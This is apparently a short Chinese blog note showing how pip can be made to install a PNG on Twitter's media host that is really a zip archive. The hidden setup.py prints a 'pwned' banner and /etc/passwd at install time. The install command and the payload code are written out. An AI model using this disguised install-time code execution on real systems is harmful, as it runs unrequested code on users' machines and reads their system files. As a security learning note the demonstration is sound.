Linux Pip RCE

Linux Pip RCE

以下是RCE的原图

https://pbs.twimg.com/media/Ff0iwcvXEAAQDZ3.png

 

您可以使用下面的pip命令进行安装

pip install "https://pbs"."twimg"."com/media/Ff0iwcvXEAAQDZ3.png"

然后可以通过修改后缀的方式

我们可以看到zip文件里面其实是一个压缩的py文件

setup.py

msg = r"""
                              _ 
                             | |
 _ ____      ___ __   ___  __| |
| '_ \ \ /\ / / '_ \ / _ \/ _` |
| |_) \ V  V /| | | |  __/ (_| |
| .__/ \_/\_/ |_| |_|\___|\__,_|
| |                             
|_|             

"""

f = open("/dev/tty", "w")
print(msg, file=f)
print(open("/etc/passwd").read(), file=f)

然后你就懂了，运行的时候会自动获取linux的/etc/passwd

 

标签：思路分享, 漏洞分享, 学习笔记